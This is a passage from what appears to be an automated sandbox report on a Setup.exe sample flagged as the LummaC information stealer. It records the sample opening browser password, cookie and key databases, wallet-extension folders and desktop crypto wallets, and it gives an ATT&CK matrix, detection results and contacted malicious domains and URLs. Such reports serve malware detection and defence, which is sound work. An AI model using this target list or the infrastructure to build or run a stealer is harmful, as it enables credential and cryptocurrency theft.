              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6576, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6576, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		221
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information              		LSASS Memory21
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol41
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Setup.exe21%ReversingLabsWin32.Trojan.Generic
              Setup.exe20%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://displayclubby.sbs/)0%Avira URL Cloudsafe
              https://displayclubby.sbs/0%Avira URL Cloudsafe
              https://displayclubby.sbs/api0%Avira URL Cloudsafe
              https://displayclubby.sbs:443/api0%Avira URL Cloudsafe
              displayclubby.sbs0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txtp100%Avira URL Cloudmalware
              https://displayclubby.sbs/apiJg0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txtds100%Avira URL Cloudmalware
              https://displayclubby.sbs/&&80%Avira URL Cloudsafe
              https://displayclubby.sbs/q0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txt1eNI100%Avira URL Cloudmalware
              https://cegu.shop/Q100%Avira URL Cloudmalware
              https://displayclubby.sbs/api;0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txtMhNf100%Avira URL Cloudmalware
              https://cegu.shop/8574262446/ph.txtebKit/537.36100%Avira URL Cloudmalware
              https://displayclubby.sbs/api$0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txtl100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              		185.161.251.21
              		truefalse
                		high
                displayclubby.sbs
                		104.21.64.1
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://displayclubby.sbs/apitrue
                  • Avira URL Cloud: safe
                  		unknown
                  displayclubby.sbstrue
                  • Avira URL Cloud: safe
                  		unknown
                  rabidcowse.shopfalse
                    		high
                    wholersorie.shopfalse
                      		high
                      cloudewahsj.shopfalse
                        		high
                        noisycuttej.shopfalse
                          		high
                          nearycrepso.shopfalse
                            		high
                            https://cegu.shop/8574262446/ph.txtfalse
                              		high
                              framekgirus.shopfalse
